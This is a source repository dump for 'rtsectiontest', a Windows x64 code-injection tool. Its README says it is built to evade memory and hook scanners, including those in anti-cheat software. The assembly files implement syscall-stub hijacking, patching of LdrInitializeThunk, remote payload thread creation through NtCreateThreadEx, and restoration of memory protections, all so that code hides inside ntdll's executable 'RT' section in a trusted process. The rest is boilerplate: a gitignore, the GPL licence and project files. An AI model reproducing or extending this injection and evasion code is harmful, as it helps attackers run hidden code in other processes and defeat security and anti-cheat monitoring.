├── .gitignore ├── LICENSE ├── README.md ├── nextgeninject.zip ├── rtsectiontest.sdf ├── rtsectiontest.sln ├── rtsectiontest ├── Libraries │ └── myntdll.bin ├── auxfuncs.asm ├── auxfuncs.h ├── auxfuncs_.asm ├── global.h ├── main.c ├── rtsectiontest.vcxproj ├── rtsectiontest.vcxproj.filters ├── rtsectiontest.vcxproj.user └── x64 │ └── Release │ ├── auxfuncs.obj │ ├── main.obj │ ├── rtsectiontest.Build.CppClean.log │ ├── rtsectiontest.log │ └── rtsectiontest.tlog │ ├── CL.command.1.tlog │ ├── CL.read.1.tlog │ ├── CL.write.1.tlog │ ├── link.command.1.tlog │ ├── link.read.1.tlog │ ├── link.write.1.tlog │ ├── rtsectiontest.lastbuildstate │ └── rtsectiontest.write.1u.tlog └── x64 └── Release ├── rtsectiontest.exe ├── rtsectiontest.map └── rtsectiontest.pdb /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | 4 | # User-specific files 5 | *.suo 6 | *.user 7 | *.userosscache 8 | *.sln.docstates 9 | 10 | # User-specific files (MonoDevelop/Xamarin Studio) 11 | *.userprefs 12 | 13 | # Build results 14 | [Dd]ebug/ 15 | [Dd]ebugPublic/ 16 | [Rr]elease/ 17 | [Rr]eleases/ 18 | x64/ 19 | x86/ 20 | build/ 21 | bld/ 22 | [Bb]in/ 23 | [Oo]bj/ 24 | 25 | # Visual Studo 2015 cache/options directory 26 | .vs/ 27 | 28 | # MSTest test Results 29 | [Tt]est[Rr]esult*/ 30 | [Bb]uild[Ll]og.* 31 | 32 | # NUNIT 33 | *.VisualState.xml 34 | TestResult.xml 35 | 36 | # Build Results of an ATL Project 37 | [Dd]ebugPS/ 38 | [Rr]eleasePS/ 39 | dlldata.c 40 | 41 | *_i.c 42 | *_p.c 43 | *_i.h 44 | *.ilk 45 | *.meta 46 | *.obj 47 | *.pch 48 | *.pdb 49 | *.pgc 50 | *.pgd 51 | *.rsp 52 | *.sbr 53 | *.tlb 54 | *.tli 55 | *.tlh 56 | *.tmp 57 | *.tmp_proj 58 | *.log 59 | *.vspscc 60 | *.vssscc 61 | .builds 62 | *.pidb 63 | *.svclog 64 | *.scc 65 | 66 | # Chutzpah Test files 67 | _Chutzpah* 68 | 69 | # Visual C++ cache files 70 | ipch/ 71 | *.aps 
72 | *.ncb 73 | *.opensdf 74 | *.sdf 75 | *.cachefile 76 | 77 | # Visual Studio profiler 78 | *.psess 79 | *.vsp 80 | *.vspx 81 | 82 | # TFS 2012 Local Workspace 83 | $tf/ 84 | 85 | # Guidance Automation Toolkit 86 | *.gpState 87 | 88 | # ReSharper is a .NET coding add-in 89 | _ReSharper*/ 90 | *.[Rr]e[Ss]harper 91 | *.DotSettings.user 92 | 93 | # JustCode is a .NET coding addin-in 94 | .JustCode 95 | 96 | # TeamCity is a build add-in 97 | _TeamCity* 98 | 99 | # DotCover is a Code Coverage Tool 100 | *.dotCover 101 | 102 | # NCrunch 103 | _NCrunch_* 104 | .*crunch*.local.xml 105 | 106 | # MightyMoose 107 | *.mm.* 108 | AutoTest.Net/ 109 | 110 | # Web workbench (sass) 111 | .sass-cache/ 112 | 113 | # Installshield output folder 114 | [Ee]xpress/ 115 | 116 | # DocProject is a documentation generator add-in 117 | DocProject/buildhelp/ 118 | DocProject/Help/*.HxT 119 | DocProject/Help/*.HxC 120 | DocProject/Help/*.hhc 121 | DocProject/Help/*.hhk 122 | DocProject/Help/*.hhp 123 | DocProject/Help/Html2 124 | DocProject/Help/html 125 | 126 | # Click-Once directory 127 | publish/ 128 | 129 | # Publish Web Output 130 | *.[Pp]ublish.xml 131 | *.azurePubxml 132 | # TODO: Comment the next line if you want to checkin your web deploy settings 133 | # but database connection strings (with potential passwords) will be unencrypted 134 | *.pubxml 135 | *.publishproj 136 | 137 | # NuGet Packages 138 | *.nupkg 139 | # The packages folder can be ignored because of Package Restore 140 | **/packages/* 141 | # except build/, which is used as an MSBuild target. 
142 | !**/packages/build/ 143 | # Uncomment if necessary however generally it will be regenerated when needed 144 | #!**/packages/repositories.config 145 | 146 | # Windows Azure Build Output 147 | csx/ 148 | *.build.csdef 149 | 150 | # Windows Store app package directory 151 | AppPackages/ 152 | 153 | # Others 154 | *.[Cc]ache 155 | ClientBin/ 156 | [Ss]tyle[Cc]op.* 157 | ~$* 158 | *~ 159 | *.dbmdl 160 | *.dbproj.schemaview 161 | *.pfx 162 | *.publishsettings 163 | node_modules/ 164 | bower_components/ 165 | 166 | # RIA/Silverlight projects 167 | Generated_Code/ 168 | 169 | # Backup & report files from converting an old project file 170 | # to a newer Visual Studio version. Backup files are not needed, 171 | # because we have git ;-) 172 | _UpgradeReport_Files/ 173 | Backup*/ 174 | UpgradeLog*.XML 175 | UpgradeLog*.htm 176 | 177 | # SQL Server files 178 | *.mdf 179 | *.ldf 180 | 181 | # Business Intelligence projects 182 | *.rdl.data 183 | *.bim.layout 184 | *.bim_*.settings 185 | 186 | # Microsoft Fakes 187 | FakesAssemblies/ 188 | 189 | # Node.js Tools for Visual Studio 190 | .ntvs_analysis.dat 191 | 192 | # Visual Studio 6 build log 193 | *.plg 194 | 195 | # Visual Studio 6 workspace options file 196 | *.opt 197 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 2, June 1991 3 | 4 | Copyright (C) 1989, 1991 Free Software Foundation, Inc., 5 | 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA 6 | Everyone is permitted to copy and distribute verbatim copies 7 | of this license document, but changing it is not allowed. 8 | 9 | Preamble 10 | 11 | The licenses for most software are designed to take away your 12 | freedom to share and change it. 
By contrast, the GNU General Public 13 | License is intended to guarantee your freedom to share and change free 14 | software--to make sure the software is free for all its users. This 15 | General Public License applies to most of the Free Software 16 | Foundation's software and to any other program whose authors commit to 17 | using it. (Some other Free Software Foundation software is covered by 18 | the GNU Lesser General Public License instead.) You can apply it to 19 | your programs, too. 20 | 21 | When we speak of free software, we are referring to freedom, not 22 | price. Our General Public Licenses are designed to make sure that you 23 | have the freedom to distribute copies of free software (and charge for 24 | this service if you wish), that you receive source code or can get it 25 | if you want it, that you can change the software or use pieces of it 26 | in new free programs; and that you know you can do these things. 27 | 28 | To protect your rights, we need to make restrictions that forbid 29 | anyone to deny you these rights or to ask you to surrender the rights. 30 | These restrictions translate to certain responsibilities for you if you 31 | distribute copies of the software, or if you modify it. 32 | 33 | For example, if you distribute copies of such a program, whether 34 | gratis or for a fee, you must give the recipients all the rights that 35 | you have. You must make sure that they, too, receive or can get the 36 | source code. And you must show them these terms so they know their 37 | rights. 38 | 39 | We protect your rights with two steps: (1) copyright the software, and 40 | (2) offer you this license which gives you legal permission to copy, 41 | distribute and/or modify the software. 42 | 43 | Also, for each author's protection and ours, we want to make certain 44 | that everyone understands that there is no warranty for this free 45 | software. 
If the software is modified by someone else and passed on, we 46 | want its recipients to know that what they have is not the original, so 47 | that any problems introduced by others will not reflect on the original 48 | authors' reputations. 49 | 50 | Finally, any free program is threatened constantly by software 51 | patents. We wish to avoid the danger that redistributors of a free 52 | program will individually obtain patent licenses, in effect making the 53 | program proprietary. To prevent this, we have made it clear that any 54 | patent must be licensed for everyone's free use or not licensed at all. 55 | 56 | The precise terms and conditions for copying, distribution and 57 | modification follow. 58 | 59 | GNU GENERAL PUBLIC LICENSE 60 | TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 61 | 62 | 0. This License applies to any program or other work which contains 63 | a notice placed by the copyright holder saying it may be distributed 64 | under the terms of this General Public License. The "Program", below, 65 | refers to any such program or work, and a "work based on the Program" 66 | means either the Program or any derivative work under copyright law: 67 | that is to say, a work containing the Program or a portion of it, 68 | either verbatim or with modifications and/or translated into another 69 | language. (Hereinafter, translation is included without limitation in 70 | the term "modification".) Each licensee is addressed as "you". 71 | 72 | Activities other than copying, distribution and modification are not 73 | covered by this License; they are outside its scope. The act of 74 | running the Program is not restricted, and the output from the Program 75 | is covered only if its contents constitute a work based on the 76 | Program (independent of having been made by running the Program). 77 | Whether that is true depends on what the Program does. 78 | 79 | 1. 
You may copy and distribute verbatim copies of the Program's 80 | source code as you receive it, in any medium, provided that you 81 | conspicuously and appropriately publish on each copy an appropriate 82 | copyright notice and disclaimer of warranty; keep intact all the 83 | notices that refer to this License and to the absence of any warranty; 84 | and give any other recipients of the Program a copy of this License 85 | along with the Program. 86 | 87 | You may charge a fee for the physical act of transferring a copy, and 88 | you may at your option offer warranty protection in exchange for a fee. 89 | 90 | 2. You may modify your copy or copies of the Program or any portion 91 | of it, thus forming a work based on the Program, and copy and 92 | distribute such modifications or work under the terms of Section 1 93 | above, provided that you also meet all of these conditions: 94 | 95 | a) You must cause the modified files to carry prominent notices 96 | stating that you changed the files and the date of any change. 97 | 98 | b) You must cause any work that you distribute or publish, that in 99 | whole or in part contains or is derived from the Program or any 100 | part thereof, to be licensed as a whole at no charge to all third 101 | parties under the terms of this License. 102 | 103 | c) If the modified program normally reads commands interactively 104 | when run, you must cause it, when started running for such 105 | interactive use in the most ordinary way, to print or display an 106 | announcement including an appropriate copyright notice and a 107 | notice that there is no warranty (or else, saying that you provide 108 | a warranty) and that users may redistribute the program under 109 | these conditions, and telling the user how to view a copy of this 110 | License. (Exception: if the Program itself is interactive but 111 | does not normally print such an announcement, your work based on 112 | the Program is not required to print an announcement.) 
113 | 114 | These requirements apply to the modified work as a whole. If 115 | identifiable sections of that work are not derived from the Program, 116 | and can be reasonably considered independent and separate works in 117 | themselves, then this License, and its terms, do not apply to those 118 | sections when you distribute them as separate works. But when you 119 | distribute the same sections as part of a whole which is a work based 120 | on the Program, the distribution of the whole must be on the terms of 121 | this License, whose permissions for other licensees extend to the 122 | entire whole, and thus to each and every part regardless of who wrote it. 123 | 124 | Thus, it is not the intent of this section to claim rights or contest 125 | your rights to work written entirely by you; rather, the intent is to 126 | exercise the right to control the distribution of derivative or 127 | collective works based on the Program. 128 | 129 | In addition, mere aggregation of another work not based on the Program 130 | with the Program (or with a work based on the Program) on a volume of 131 | a storage or distribution medium does not bring the other work under 132 | the scope of this License. 133 | 134 | 3. 
You may copy and distribute the Program (or a work based on it, 135 | under Section 2) in object code or executable form under the terms of 136 | Sections 1 and 2 above provided that you also do one of the following: 137 | 138 | a) Accompany it with the complete corresponding machine-readable 139 | source code, which must be distributed under the terms of Sections 140 | 1 and 2 above on a medium customarily used for software interchange; or, 141 | 142 | b) Accompany it with a written offer, valid for at least three 143 | years, to give any third party, for a charge no more than your 144 | cost of physically performing source distribution, a complete 145 | machine-readable copy of the corresponding source code, to be 146 | distributed under the terms of Sections 1 and 2 above on a medium 147 | customarily used for software interchange; or, 148 | 149 | c) Accompany it with the information you received as to the offer 150 | to distribute corresponding source code. (This alternative is 151 | allowed only for noncommercial distribution and only if you 152 | received the program in object code or executable form with such 153 | an offer, in accord with Subsection b above.) 154 | 155 | The source code for a work means the preferred form of the work for 156 | making modifications to it. For an executable work, complete source 157 | code means all the source code for all modules it contains, plus any 158 | associated interface definition files, plus the scripts used to 159 | control compilation and installation of the executable. However, as a 160 | special exception, the source code distributed need not include 161 | anything that is normally distributed (in either source or binary 162 | form) with the major components (compiler, kernel, and so on) of the 163 | operating system on which the executable runs, unless that component 164 | itself accompanies the executable. 
165 | 166 | If distribution of executable or object code is made by offering 167 | access to copy from a designated place, then offering equivalent 168 | access to copy the source code from the same place counts as 169 | distribution of the source code, even though third parties are not 170 | compelled to copy the source along with the object code. 171 | 172 | 4. You may not copy, modify, sublicense, or distribute the Program 173 | except as expressly provided under this License. Any attempt 174 | otherwise to copy, modify, sublicense or distribute the Program is 175 | void, and will automatically terminate your rights under this License. 176 | However, parties who have received copies, or rights, from you under 177 | this License will not have their licenses terminated so long as such 178 | parties remain in full compliance. 179 | 180 | 5. You are not required to accept this License, since you have not 181 | signed it. However, nothing else grants you permission to modify or 182 | distribute the Program or its derivative works. These actions are 183 | prohibited by law if you do not accept this License. Therefore, by 184 | modifying or distributing the Program (or any work based on the 185 | Program), you indicate your acceptance of this License to do so, and 186 | all its terms and conditions for copying, distributing or modifying 187 | the Program or works based on it. 188 | 189 | 6. Each time you redistribute the Program (or any work based on the 190 | Program), the recipient automatically receives a license from the 191 | original licensor to copy, distribute or modify the Program subject to 192 | these terms and conditions. You may not impose any further 193 | restrictions on the recipients' exercise of the rights granted herein. 194 | You are not responsible for enforcing compliance by third parties to 195 | this License. 196 | 197 | 7. 
If, as a consequence of a court judgment or allegation of patent 198 | infringement or for any other reason (not limited to patent issues), 199 | conditions are imposed on you (whether by court order, agreement or 200 | otherwise) that contradict the conditions of this License, they do not 201 | excuse you from the conditions of this License. If you cannot 202 | distribute so as to satisfy simultaneously your obligations under this 203 | License and any other pertinent obligations, then as a consequence you 204 | may not distribute the Program at all. For example, if a patent 205 | license would not permit royalty-free redistribution of the Program by 206 | all those who receive copies directly or indirectly through you, then 207 | the only way you could satisfy both it and this License would be to 208 | refrain entirely from distribution of the Program. 209 | 210 | If any portion of this section is held invalid or unenforceable under 211 | any particular circumstance, the balance of the section is intended to 212 | apply and the section as a whole is intended to apply in other 213 | circumstances. 214 | 215 | It is not the purpose of this section to induce you to infringe any 216 | patents or other property right claims or to contest validity of any 217 | such claims; this section has the sole purpose of protecting the 218 | integrity of the free software distribution system, which is 219 | implemented by public license practices. Many people have made 220 | generous contributions to the wide range of software distributed 221 | through that system in reliance on consistent application of that 222 | system; it is up to the author/donor to decide if he or she is willing 223 | to distribute software through any other system and a licensee cannot 224 | impose that choice. 225 | 226 | This section is intended to make thoroughly clear what is believed to 227 | be a consequence of the rest of this License. 228 | 229 | 8. 
If the distribution and/or use of the Program is restricted in 230 | certain countries either by patents or by copyrighted interfaces, the 231 | original copyright holder who places the Program under this License 232 | may add an explicit geographical distribution limitation excluding 233 | those countries, so that distribution is permitted only in or among 234 | countries not thus excluded. In such case, this License incorporates 235 | the limitation as if written in the body of this License. 236 | 237 | 9. The Free Software Foundation may publish revised and/or new versions 238 | of the General Public License from time to time. Such new versions will 239 | be similar in spirit to the present version, but may differ in detail to 240 | address new problems or concerns. 241 | 242 | Each version is given a distinguishing version number. If the Program 243 | specifies a version number of this License which applies to it and "any 244 | later version", you have the option of following the terms and conditions 245 | either of that version or of any later version published by the Free 246 | Software Foundation. If the Program does not specify a version number of 247 | this License, you may choose any version ever published by the Free Software 248 | Foundation. 249 | 250 | 10. If you wish to incorporate parts of the Program into other free 251 | programs whose distribution conditions are different, write to the author 252 | to ask for permission. For software which is copyrighted by the Free 253 | Software Foundation, write to the Free Software Foundation; we sometimes 254 | make exceptions for this. Our decision will be guided by the two goals 255 | of preserving the free status of all derivatives of our free software and 256 | of promoting the sharing and reuse of software generally. 257 | 258 | NO WARRANTY 259 | 260 | 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY 261 | FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. 
EXCEPT WHEN 262 | OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES 263 | PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED 264 | OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF 265 | MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS 266 | TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE 267 | PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, 268 | REPAIR OR CORRECTION. 269 | 270 | 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 271 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR 272 | REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, 273 | INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING 274 | OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED 275 | TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY 276 | YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER 277 | PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE 278 | POSSIBILITY OF SUCH DAMAGES. 279 | 280 | END OF TERMS AND CONDITIONS 281 | 282 | How to Apply These Terms to Your New Programs 283 | 284 | If you develop a new program, and you want it to be of the greatest 285 | possible use to the public, the best way to achieve this is to make it 286 | free software which everyone can redistribute and change under these terms. 287 | 288 | To do so, attach the following notices to the program. It is safest 289 | to attach them to the start of each source file to most effectively 290 | convey the exclusion of warranty; and each file should have at least 291 | the "copyright" line and a pointer to where the full notice is found. 
292 | 293 | {description} 294 | Copyright (C) {year} {fullname} 295 | 296 | This program is free software; you can redistribute it and/or modify 297 | it under the terms of the GNU General Public License as published by 298 | the Free Software Foundation; either version 2 of the License, or 299 | (at your option) any later version. 300 | 301 | This program is distributed in the hope that it will be useful, 302 | but WITHOUT ANY WARRANTY; without even the implied warranty of 303 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 304 | GNU General Public License for more details. 305 | 306 | You should have received a copy of the GNU General Public License along 307 | with this program; if not, write to the Free Software Foundation, Inc., 308 | 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. 309 | 310 | Also add information on how to contact you by electronic and paper mail. 311 | 312 | If the program is interactive, make it output a short notice like this 313 | when it starts in an interactive mode: 314 | 315 | Gnomovision version 69, Copyright (C) year name of author 316 | Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 317 | This is free software, and you are welcome to redistribute it 318 | under certain conditions; type `show c' for details. 319 | 320 | The hypothetical commands `show w' and `show c' should show the appropriate 321 | parts of the General Public License. Of course, the commands you use may 322 | be called something other than `show w' and `show c'; they could even be 323 | mouse-clicks or menu items--whatever suits your program. 324 | 325 | You should also get your employer (if you work as a programmer) or your 326 | school, if any, to sign a "copyright disclaimer" for the program, if 327 | necessary. Here is a sample; alter the names: 328 | 329 | Yoyodyne, Inc., hereby disclaims all copyright interest in the program 330 | `Gnomovision' (which makes passes at compilers) written by James Hacker. 
331 | 332 | {signature of Ty Coon}, 1 April 1989 333 | Ty Coon, President of Vice 334 | 335 | This General Public License does not permit incorporating your program into 336 | proprietary programs. If your program is a subroutine library, you may 337 | consider it more useful to permit linking proprietary applications with the 338 | library. If this is what you want to do, use the GNU Lesser General 339 | Public License instead of this License. 340 | 341 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # rtsectiontest 2 | An Attempt to Bypass Memory Scanners By Misusing the ntdll.dll "RT" Section. 3 | 4 | SEE WINDOWS 10 10525+ ISSUE!!! 5 | 6 | See also branch "rtsectiontest_2"! 7 | 8 | 9 | The rtsectiontest project attempts to trick (simple) memory/hook scanners by leaving neither any memory protection alteration nor any additional RX/RWX memory behind, whether the scanners are used on demand or employed inside anti-cheat software. 10 | In order to do this, it tries to place the payload code within the last 2 KB of an undocumented section "RT" of ntdll.dll in the VA space of an arbitrary non-protected (yet trusted) process, whose name may be specified in a #define statement. 11 | The "RT" section is 4 KB in size and executable by default. 12 | 13 | Moreover, it tries to keep a low profile while attempting to gain control of the trusted process by letting x64 HIPS only see the occurrence of an NtOpenProcess call. 14 | First-time execution of arbitrary code is triggered using syscall stub hijacking in order to then force silent creation of a dedicated payload thread. 15 | Due to the small section size as well as the required bootstrap code, any payload code should fit into 2 KB. 
16 | 17 | By elaborately using the Windows thread pool facility, the remote code execution is now immediate and no longer needs 18 | to wait until a particular syscall stub is called. 19 | 20 | NOTE: The payload code still consists of nothing but a single "EB FE" instruction. Furthermore, there is still no interface for adding code written in C. 21 | 22 | Quick edit: a C interface with basic low-level debug output has been implemented. 23 | Detection was again checked against WIN64AST for Windows 10; now only the 24 | "NtOpenProcess(..., PROCESS_ALL_ACCESS,...)" detection is found, nothing further. 25 | 26 | The code is way too large to fit into the 2 KB of the RT section. 27 | -------------------------------------------------------------------------------- /nextgeninject.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Microwave89/rtsectiontest/fe36fd2403c69db6d9024f95282fc9d2a60caa2d/nextgeninject.zip -------------------------------------------------------------------------------- /rtsectiontest.sdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Microwave89/rtsectiontest/fe36fd2403c69db6d9024f95282fc9d2a60caa2d/rtsectiontest.sdf -------------------------------------------------------------------------------- /rtsectiontest.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 14 4 | VisualStudioVersion = 14.0.23107.0 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "rtsectiontest", "rtsectiontest\rtsectiontest.vcxproj", "{16086A51-3A9D-41EF-B34B-1382E6EE808D}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Release|x64 = Release|x64 11 | EndGlobalSection 12 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 13 | 
{16086A51-3A9D-41EF-B34B-1382E6EE808D}.Release|x64.ActiveCfg = Release|x64 14 | {16086A51-3A9D-41EF-B34B-1382E6EE808D}.Release|x64.Build.0 = Release|x64 15 | EndGlobalSection 16 | GlobalSection(SolutionProperties) = preSolution 17 | HideSolutionNode = FALSE 18 | EndGlobalSection 19 | EndGlobal 20 | -------------------------------------------------------------------------------- /rtsectiontest/Libraries/myntdll.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Microwave89/rtsectiontest/fe36fd2403c69db6d9024f95282fc9d2a60caa2d/rtsectiontest/Libraries/myntdll.bin -------------------------------------------------------------------------------- /rtsectiontest/auxfuncs.asm: -------------------------------------------------------------------------------- 1 | ;extrn NtSuspendProcess: PROC 2 | ;extrn LdrInitializeThunk: PROC 3 | .code 4 | mymemcmp PROC 5 | push rsi 6 | push rdi 7 | mov rsi, rcx 8 | mov rdi, rdx 9 | mov rcx, r8 10 | cld 11 | cmp rcx, rcx 12 | repe cmpsb 13 | setz al 14 | pop rdi 15 | pop rsi 16 | ret 17 | mymemcmp ENDP 18 | 19 | .data 20 | injectionCode PROC 21 | db 0E8h 22 | dd 0BBBBBBBBh 23 | injectionCode ENDP 24 | 25 | ;fpBootstrapRoutine PROC 26 | bootstrapRoutineBegin PROC 27 | bootstrapRoutineBegin ENDP 28 | push rbx 29 | mov rax, qword ptr [rsp+8] 30 | sub rax, 5 31 | mov qword ptr [rsp+8], rax 32 | dw 0BB48h ;movabs rbx, ? 33 | originalSyscallCode PROC 34 | dq 0CCCCCCCCCCCCCCCCh 35 | originalSyscallCode ENDP 36 | lock xchg qword ptr [rax], rbx 37 | xor rax, rax 38 | mov rax, qword ptr gs:[rax+60h] 39 | mov rax, qword ptr [rax+10h] 40 | mov ebx, dword ptr [rax+3Ch] 41 | add rax, rbx 42 | pop rbx 43 | cmp word ptr [rax+4], 8664h 44 | jne iswow64 45 | cmp word ptr [rax+18h], 20Bh 46 | je isamd64 47 | iswow64: 48 | ;ret 49 | isamd64: 50 | push rcx 51 | push rdx 52 | push r8 53 | push r9 54 | sub rsp, 20h 55 | ;lea rcx, NtSuspendProcess ;(this is Not pic code!) 
56 | ;int 3 57 | ;or r10,-1 58 | ;mov eax, 161h 59 | call fpCreatePayloadThread 60 | ;syscall 61 | ;looooop: 62 | ;jmp looooop 63 | 64 | add rsp, 20h 65 | pop r9 66 | pop r8 67 | pop rdx 68 | pop rcx 69 | ret 70 | ;fpBootstrapRoutine ENDP 71 | 72 | syscallStub PROC 73 | mov eax, ecx 74 | mov r10, rdx 75 | mov rdx, r8 76 | mov r8, r9 77 | mov r9, qword ptr [rsp+28h] 78 | add rsp, 8h 79 | nop 80 | syscall 81 | sub rsp, 8h 82 | ret 83 | syscallStub ENDP 84 | 85 | fpCreatePayloadThread PROC 86 | createPayloadThreadBegin PROC 87 | createPayloadThreadBegin ENDP 88 | mov r11, rsp 89 | sub rsp, 68h 90 | xor eax, eax 91 | lea rdx, [r11+10h] 92 | mov qword ptr [r11-10h], rax 93 | xor r9d, r9d 94 | mov qword ptr [r11-18h], rax 95 | mov r8d, 1fffffh 96 | mov qword ptr [r11-20h], rax 97 | mov qword ptr [r11-28h], rax 98 | mov qword ptr [r11-30h], rax 99 | or rax, -1 100 | mov qword ptr [r11-38h], rax 101 | mov qword ptr [r11-48h], rax 102 | mov rcx, qword ptr [ldrInitializeThunkAddr] 103 | lea rax, looop 104 | sub rax, rcx 105 | sub rax, 5 106 | mov byte ptr [r11-40h], 0E9h 107 | mov dword ptr [r11-3Fh], eax 108 | mov rax, rcx 109 | mov rcx, qword ptr [rcx] 110 | mov qword ptr [originalLdrInitThunk], rcx 111 | mov rcx, qword ptr [r11-40h] 112 | lock xchg qword ptr [rax], rcx 113 | db 0B9h 114 | ntCreateThreadExNumber PROC 115 | dd 0DDDDDDDDh 116 | ntCreateThreadExNumber ENDP 117 | call syscallStub 118 | add rsp, 68h 119 | ret 120 | fpCreatePayloadThread ENDP 121 | createPayloadThreadEnd PROC 122 | createPayloadThreadEnd ENDP 123 | ldrInitializeThunkAddr PROC 124 | dq 0CCCCCCCCCCCCCCCCh ;;&ntdll!LdrInitializeThunk 125 | ldrInitializeThunkAddr ENDP 126 | ntdllRxBasePriv: 127 | ntdllRxBaseAddr PROC 128 | dq 1111111111111111h ;;pNtdllRxBase 129 | ntdllRxBaseAddr ENDP 130 | protSizePriv: 131 | protSize PROC 132 | dq 5555555555555555h ;;bytesToProtect 133 | protSize ENDP 134 | origProtPriv: 135 | origProt PROC 136 | dd 44444444h ;;oldProt 137 | origProt ENDP 138 | 
originalLdrInitThunk dq 9999999999999999h 139 | looop: 140 | mov rax, qword ptr [originalLdrInitThunk] 141 | mov rcx, qword ptr [ldrInitializeThunkAddr] 142 | lock xchg qword ptr [rcx], rax 143 | sub rsp, 50h 144 | or rdx, -1 145 | mov rax, qword ptr [ntdllRxBasePriv] 146 | mov [rsp+38h], rax 147 | lea r8, [rsp+38h] 148 | mov rax, qword ptr [protSizePriv] 149 | mov [rsp+40h], rax 150 | lea r9, [rsp+40h] 151 | mov ecx, dword ptr [origProtPriv] 152 | mov dword ptr [rsp+20h], ecx 153 | lea rcx, [rsp+30h] 154 | mov qword ptr [rsp+28h], rcx 155 | db 0B9h 156 | ntProtectVirtMemNumber PROC 157 | dd 033333333h ;;((PNT_SYSCALL_STUB)&NtProtectVirtualMemory)->syscallNr 158 | ntProtectVirtMemNumber ENDP 159 | call syscallStub 160 | add rsp, 50h 161 | ;status = NtProtectVirtualMemory(hProcess, &pNtdllRxBegin, &bytesToProtect, PAGE_EXECUTE_READWRITE, &oldHookProtect); 162 | ;int 3 163 | or r10,-1 164 | mov eax, 161h 165 | syscall 166 | loooop: 167 | jmp loooop 168 | bootstrapRoutineEnd PROC 169 | bootstrapRoutineEnd ENDP 170 | ;fpCreatePayloadThread: 171 | END 172 | -------------------------------------------------------------------------------- /rtsectiontest/auxfuncs.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | //extern NTSTATUS syscallStub(ULONG syscallNum, ...); 3 | //__forceinline extern void myTerminate(void); 4 | extern BOOLEAN mymemcmp(PVOID src1, PVOID src2, SIZE_T length); 5 | extern ULONG injectionCode; 6 | extern ULONG_PTR originalSyscallCode; 7 | extern void fpCreatePayloadThread(ULONG_PTR payloadCodeAddress); 8 | //extern void fpBootstrapRoutine(void); 9 | extern PVOID createPayloadThreadBegin; 10 | extern PVOID createPayloadThreadEnd; 11 | extern UCHAR bootstrapRoutineBegin; 12 | extern UCHAR bootstrapRoutineEnd; 13 | extern SIZE_T protSize; 14 | extern ULONG ntCreateThreadExNumber; 15 | extern ULONG ntProtectVirtMemNumber; 16 | extern ULONG origProt; 17 | extern ULONG_PTR ldrInitializeThunkAddr; 18 | 
extern ULONG_PTR ntdllRxBaseAddr; 19 | -------------------------------------------------------------------------------- /rtsectiontest/auxfuncs_.asm: -------------------------------------------------------------------------------- 1 | ;extrn NtSuspendProcess: PROC 2 | ;extrn LdrInitializeThunk: PROC 3 | .code 4 | mymemcmp PROC 5 | push rsi 6 | push rdi 7 | mov rsi, rcx 8 | mov rdi, rdx 9 | mov rcx, r8 10 | cld 11 | cmp rcx, rcx 12 | repe cmpsb 13 | setz al 14 | pop rdi 15 | pop rsi 16 | ret 17 | mymemcmp ENDP 18 | 19 | .data 20 | injectionCode PROC 21 | db 0E8h 22 | dd 0BBBBBBBBh 23 | injectionCode ENDP 24 | 25 | ;fpBootstrapRoutine PROC 26 | bootstrapRoutineBegin PROC 27 | bootstrapRoutineBegin ENDP 28 | push rbx 29 | mov rax, qword ptr [rsp+8] 30 | sub rax, 5 31 | mov qword ptr [rsp+8], rax 32 | dw 0BB48h ;movabs rbx, ? 33 | originalSyscallCode PROC 34 | dq 0CCCCCCCCCCCCCCCCh 35 | originalSyscallCode ENDP 36 | lock xchg qword ptr [rax], rbx 37 | xor rax, rax 38 | mov rax, qword ptr gs:[rax+60h] 39 | mov rax, qword ptr [rax+10h] 40 | mov ebx, dword ptr [rax+3Ch] 41 | add rax, rbx 42 | pop rbx 43 | cmp word ptr [rax+4], 8664h 44 | jne iswow64 45 | cmp word ptr [rax+18h], 20Bh 46 | je isamd64 47 | iswow64: 48 | ret 49 | 